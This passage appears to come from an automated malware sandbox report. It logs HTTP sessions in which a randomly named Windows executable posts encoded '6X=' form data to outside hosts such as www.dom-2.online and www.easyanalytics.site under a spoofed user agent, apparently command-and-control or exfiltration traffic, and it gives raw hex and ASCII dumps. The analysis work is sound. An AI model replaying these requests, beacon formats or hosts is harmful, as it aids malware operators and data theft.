                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                    Sep 22, 2024 17:41:49.394926071 CEST567INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjhmNGNiM2YtNzNlYi00MzNlLTg4YWMtMmI5ZGVkZGQ2ZDJjIiwicGFnZV90aW1lIjoxNzI3MDE5Nz


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    23192.168.2.449760199.59.243.227805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:41:51.432990074 CEST10838OUTPOST /m409/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.dom-2.online
                    Origin: http://www.dom-2.online
                    Content-Length: 10299
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.dom-2.online/m409/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 69 69 37 58 73 74 61 4d 6f 46 71 6a 69 7a 6c 75 72 77 76 56 75 39 45 44 7a 45 5a 30 7a 52 4a 4f 70 6c 71 49 68 34 72 78 74 69 62 65 6a 42 73 55 54 41 79 74 6d 72 71 2b 35 33 4f 6e 2b 50 30 51 6f 71 45 2b 46 4f 66 37 35 56 39 44 4b 46 66 62 56 2b 54 39 41 46 73 66 63 69 2f 31 4e 43 66 6e 45 32 78 73 79 47 69 65 55 75 63 38 48 66 67 52 39 48 45 77 78 34 4b 48 7a 4d 70 4f 4e 73 35 63 52 74 36 45 71 59 56 34 71 72 62 46 79 33 70 62 52 64 2b 30 79 70 66 47 6d 32 58 44 57 33 47 6b 74 73 43 51 30 44 56 55 4e 57 67 54 44 6f 45 59 62 46 6a 75 47 34 31 70 4b 4e 41 4d 50 54 53 57 35 37 63 76 36 75 58 79 46 2b 55 4f 6d 66 66 61 33 47 64 37 42 79 74 55 55 6a 66 54 34 51 30 50 66 52 55 4f 34 46 73 52 46 61 6b 6d 6d 49 4f 73 56 43 34 2b 41 33 64 67 68 6a 77 63 78 4d 42 75 4f 51 72 58 39 6e 66 53 2b 50 50 36 32 2f 68 4c 53 58 7a 2b 38 37 2f 58 56 4b 53 5a 39 4c 46 78 75 69 4a 47 45 35 34 2b 56 76 67 6e 6f 32 51 41 4c 4d 67 5a 42 4e 70 41 57 4c 38 68 47 4f 33 5a 56 65 53 6c 56 38 78 6f 48 46 72 49 32 75 5a [TRUNCATED]
                    Data Ascii: 6X=ii7XstaMoFqjizlurwvVu9EDzEZ0zRJOplqIh4rxtibejBsUTAytmrq+53On+P0QoqE+FOf75V9DKFfbV+T9AFsfci/1NCfnE2xsyGieUuc8HfgR9HEwx4KHzMpONs5cRt6EqYV4qrbFy3pbRd+0ypfGm2XDW3GktsCQ0DVUNWgTDoEYbFjuG41pKNAMPTSW57cv6uXyF+UOmffa3Gd7BytUUjfT4Q0PfRUO4FsRFakmmIOsVC4+A3dghjwcxMBuOQrX9nfS+PP62/hLSXz+87/XVKSZ9LFxuiJGE54+Vvgno2QALMgZBNpAWL8hGO3ZVeSlV8xoHFrI2uZFyFPVS5dOHiSaUD5wH+kLL3/4Fm915hN8FEe5S5YFMovwqKC6myEnzIgWkVCzyEnjFvDyN1M2e2UevzSAjzz6DjmKpggUJr8YPeDE3jUDGyBsvFm/pYMzrgtosi4uotpcHlo9ezHCcMmA6tugbFYOAYjb1N9ij/xZICABny/PwbY42fmpKNyXll+he6RAJz/qQ3SruIj7Lh7anC0XWzjWCYll8X69t8dswP5YohNyK8XGjczY5bVk6i9C6VD1zKRNNekX6/py7DaRCRlsiZe5VEGsmwHl523MRjN/02CCyJHZ8zsRdcFRz60a7q5X/s8Dum6nU7doqBRA3bpXc3VheVIFitqqEmPfO0eiUCwERqD034cb5yB6lwc2gsndk7nVEq5zyrW4EotmP8RioRFGy8WOxMqt/2V37paP7tlxtSfwbRkA4hXGup/fqVPVvddFryPfBoOuL8Jet9DT+aC5kvTZYfn/zwFD60po2o8LZf3FBqg2Pz20e+QPRVlT4Qt5jGA6S9G5DkPNDFPv5I2i3yPAZssleT50OCVgPv4adFLplOhWH/aZ9/HUlFEegn9Y2iPrJS1s12AqRYVJsVKepuNOzC7COiv+0QNCdpr2F7x09IqywDtqNY7Yi1nufth1OD/O+a32e/wAAFUtenJU9Q8cH8l/3q7s2 [TRUNCATED]
                    Sep 22, 2024 17:41:52.520904064 CEST1236INHTTP/1.1 200 OK
                    date: Sun, 22 Sep 2024 15:41:51 GMT
                    content-type: text/html; charset=utf-8
                    content-length: 1114
                    x-request-id: a30e9cb6-6d56-4a70-b349-d0b8adef285a
                    cache-control: no-store, max-age=0
                    accept-ch: sec-ch-prefers-color-scheme
                    critical-ch: sec-ch-prefers-color-scheme
                    vary: sec-ch-prefers-color-scheme
                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==
                    set-cookie: parking_session=a30e9cb6-6d56-4a70-b349-d0b8adef285a; expires=Sun, 22 Sep 2024 15:56:51 GMT; path=/
                    connection: close
                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 56 37 32 51 4f 4f 63 46 37 2b 6a 79 79 77 53 7a 61 36 63 7a 64 73 38 66 62 4e 73 78 69 45 45 73 47 39 34 52 72 68 76 4b 6c 34 6b 2b 6f 34 38 6a 70 57 55 56 79 43 45 39 52 56 47 7a 6a 62 4f 52 4d 6a 77 67 50 48 57 70 5a 4b 30 49 61 30 47 50 73 5a 39 46 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                    Sep 22, 2024 17:41:52.520925999 CEST567INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTMwZTljYjYtNmQ1Ni00YTcwLWIzNDktZDBiOGFkZWYyODVhIiwicGFnZV90aW1lIjoxNzI3MDE5Nz
                    Sep 22, 2024 17:41:52.520962954 CEST1236INHTTP/1.1 200 OK
                    date: Sun, 22 Sep 2024 15:41:51 GMT
                    content-type: text/html; charset=utf-8
                    content-length: 1114
                    x-request-id: a30e9cb6-6d56-4a70-b349-d0b8adef285a
                    cache-control: no-store, max-age=0
                    accept-ch: sec-ch-prefers-color-scheme
                    critical-ch: sec-ch-prefers-color-scheme
                    vary: sec-ch-prefers-color-scheme
                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==
                    set-cookie: parking_session=a30e9cb6-6d56-4a70-b349-d0b8adef285a; expires=Sun, 22 Sep 2024 15:56:51 GMT; path=/
                    connection: close
                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 56 37 32 51 4f 4f 63 46 37 2b 6a 79 79 77 53 7a 61 36 63 7a 64 73 38 66 62 4e 73 78 69 45 45 73 47 39 34 52 72 68 76 4b 6c 34 6b 2b 6f 34 38 6a 70 57 55 56 79 43 45 39 52 56 47 7a 6a 62 4f 52 4d 6a 77 67 50 48 57 70 5a 4b 30 49 61 30 47 50 73 5a 39 46 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    24192.168.2.449761199.59.243.227805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:41:53.977318048 CEST482OUTGET /m409/?6X=vgT3vdiL6XmHyQpuqznGmu4w6V9vwAtJ/QiZ74rQqCLiqTobayGplqDkxFD969c96YoECNzKpiIWNF3RdO36GE5+Hjm0BUXOD0JGo2GVPeYBG+tw9V1xstM=&_vft=vxWlbDi8ipa49jzp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Host: www.dom-2.online
                    Connection: close
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Sep 22, 2024 17:41:54.448005915 CEST1236INHTTP/1.1 200 OK
                    date: Sun, 22 Sep 2024 15:41:53 GMT
                    content-type: text/html; charset=utf-8
                    content-length: 1466
                    x-request-id: dd4d7c06-5099-416f-9a8a-ffab1ca4b020
                    cache-control: no-store, max-age=0
                    accept-ch: sec-ch-prefers-color-scheme
                    critical-ch: sec-ch-prefers-color-scheme
                    vary: sec-ch-prefers-color-scheme
                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rmL6BH7tJ2eFXh4jATZDBVu/MPs3YsB+WPfXUeGTVUdhItc5dbyqpHNZeI/H3XXkQ7w2LVGnMbCy6KPdLR+1Jw==
                    set-cookie: parking_session=dd4d7c06-5099-416f-9a8a-ffab1ca4b020; expires=Sun, 22 Sep 2024 15:56:54 GMT; path=/
                    connection: close
                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 6d 4c 36 42 48 37 74 4a 32 65 46 58 68 34 6a 41 54 5a 44 42 56 75 2f 4d 50 73 33 59 73 42 2b 57 50 66 58 55 65 47 54 56 55 64 68 49 74 63 35 64 62 79 71 70 48 4e 5a 65 49 2f 48 33 58 58 6b 51 37 77 32 4c 56 47 6e 4d 62 43 79 36 4b 50 64 4c 52 2b 31 4a 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rmL6BH7tJ2eFXh4jATZDBVu/MPs3YsB+WPfXUeGTVUdhItc5dbyqpHNZeI/H3XXkQ7w2LVGnMbCy6KPdLR+1Jw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                    Sep 22, 2024 17:41:54.448029995 CEST919INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGQ0ZDdjMDYtNTA5OS00MTZmLTlhOGEtZmZhYjFjYTRiMDIwIiwicGFnZV90aW1lIjoxNzI3MDE5Nz


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    25192.168.2.449762162.241.226.190805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:41:59.523307085 CEST754OUTPOST /21tc/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.easyanalytics.site
                    Origin: http://www.easyanalytics.site
                    Content-Length: 199
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.easyanalytics.site/21tc/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 51 62 46 42 4e 55 68 47 6f 39 2f 6e 57 64 50 78 47 52 48 7a 65 5a 5a 32 4c 77 32 6b 6c 61 6b 6d 33 64 70 31 30 46 62 73 6e 71 2f 44 77 4c 42 57 6c 4a 44 63 4e 39 5a 61 57 66 79 7a 77 4a 47 42 6f 30 68 39 52 2b 79 44 31 71 4b 41 72 30 71 6c 58 53 48 4a 32 6c 71 64 55 32 75 4c 4b 47 79 66 79 65 44 6e 63 49 72 34 33 79 35 2f 5a 45 2f 54 67 59 2f 32 32 46 63 33 76 62 71 66 4d 38 4d 33 33 34 44 33 59 43 4a 6f 4a 75 39 31 4b 36 63 67 62 5a 78 79 75 69 32 50 57 38 30 59 56 77 74 53 31 4d 31 30 56 56 69 51 7a 34 34 45 6b 43 66 48 34 39 74 43 58 5a 4d 65 54 63 59 71 67 63 62 4d 75 41 3d 3d
                    Data Ascii: 6X=QbFBNUhGo9/nWdPxGRHzeZZ2Lw2klakm3dp10Fbsnq/DwLBWlJDcN9ZaWfyzwJGBo0h9R+yD1qKAr0qlXSHJ2lqdU2uLKGyfyeDncIr43y5/ZE/TgY/22Fc3vbqfM8M334D3YCJoJu91K6cgbZxyui2PW80YVwtS1M10VViQz44EkCfH49tCXZMeTcYqgcbMuA==
                    Sep 22, 2024 17:42:00.093818903 CEST479INHTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:42:00 GMT
                    Server: Apache
                    Content-Length: 315
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    26192.168.2.449763162.241.226.190805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:42:02.115166903 CEST774OUTPOST /21tc/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.easyanalytics.site
                    Origin: http://www.easyanalytics.site
                    Content-Length: 219
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.easyanalytics.site/21tc/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 51 62 46 42 4e 55 68 47 6f 39 2f 6e 58 39 2f 78 48 79 66 7a 59 35 5a 70 58 67 32 6b 2f 71 6b 69 33 64 6c 31 30 47 58 38 6e 5a 62 44 78 72 78 57 6d 4c 72 63 4b 39 5a 61 5a 2f 79 32 30 4a 47 30 6f 30 6c 44 52 37 4b 44 31 71 65 41 72 78 57 6c 58 67 76 57 33 31 71 6c 4d 47 75 4a 55 32 79 66 79 65 44 6e 63 4d 44 47 33 7a 64 2f 5a 31 76 54 76 64 4c 31 71 31 63 34 73 62 71 66 49 38 4d 4e 33 34 44 42 59 43 34 2f 4a 74 46 31 4b 37 73 67 61 49 78 78 35 53 32 46 4c 73 31 55 52 79 30 5a 73 50 41 48 52 58 4f 77 7a 71 38 49 73 6b 4f 64 70 4d 4d 56 46 5a 6f 74 4f 62 52 65 74 66 6d 46 31 44 70 41 2f 31 4e 42 59 59 53 6b 4e 48 57 49 6d 63 47 6c 59 59 63 3d
                    Data Ascii: 6X=QbFBNUhGo9/nX9/xHyfzY5ZpXg2k/qki3dl10GX8nZbDxrxWmLrcK9ZaZ/y20JG0o0lDR7KD1qeArxWlXgvW31qlMGuJU2yfyeDncMDG3zd/Z1vTvdL1q1c4sbqfI8MN34DBYC4/JtF1K7sgaIxx5S2FLs1URy0ZsPAHRXOwzq8IskOdpMMVFZotObRetfmF1DpA/1NBYYSkNHWImcGlYYc=
                    Sep 22, 2024 17:42:02.976418972 CEST479INHTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:42:02 GMT
                    Server: Apache
                    Content-Length: 315
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    27192.168.2.449764162.241.226.190805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:42:04.667224884 CEST10856OUTPOST /21tc/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.easyanalytics.site
                    Origin: http://www.easyanalytics.site
                    Content-Length: 10299
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.easyanalytics.site/21tc/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 51 62 46 42 4e 55 68 47 6f 39 2f 6e 58 39 2f 78 48 79 66 7a 59 35 5a 70 58 67 32 6b 2f 71 6b 69 33 64 6c 31 30 47 58 38 6e 5a 54 44 78 59 35 57 68 61 72 63 4c 39 5a 61 55 66 79 33 30 4a 47 70 6f 30 64 48 52 36 33 30 31 6f 6d 41 6f 55 61 6c 52 55 37 57 75 46 71 6c 46 6d 75 55 4b 47 7a 4c 79 66 7a 37 63 49 66 47 33 7a 64 2f 5a 32 48 54 72 49 2f 31 6f 31 63 33 76 62 71 54 4d 38 4e 44 33 34 4c 2f 59 44 4e 43 4a 63 6c 31 4e 62 38 67 63 36 70 78 6c 43 32 44 4b 73 30 4a 52 79 49 57 73 50 64 38 52 54 4f 57 7a 6f 67 49 70 31 2f 47 38 66 73 6f 47 4a 38 42 55 62 46 74 6b 76 57 6e 30 7a 45 30 2b 48 39 69 61 4c 6e 4e 4b 6c 72 61 38 38 57 43 46 50 66 4b 4a 32 4a 6f 67 70 42 37 39 59 79 71 52 52 72 64 51 6b 6a 2b 71 46 37 4e 52 37 4f 6f 6f 50 5a 66 4b 36 71 2b 34 39 4f 70 75 72 46 63 50 47 32 65 79 47 61 4d 45 70 6f 75 2f 36 49 55 5a 74 69 4c 79 6d 61 79 6d 2b 49 35 76 65 6c 54 79 69 47 58 35 47 4a 46 37 37 52 38 73 79 5a 72 58 66 6a 34 2f 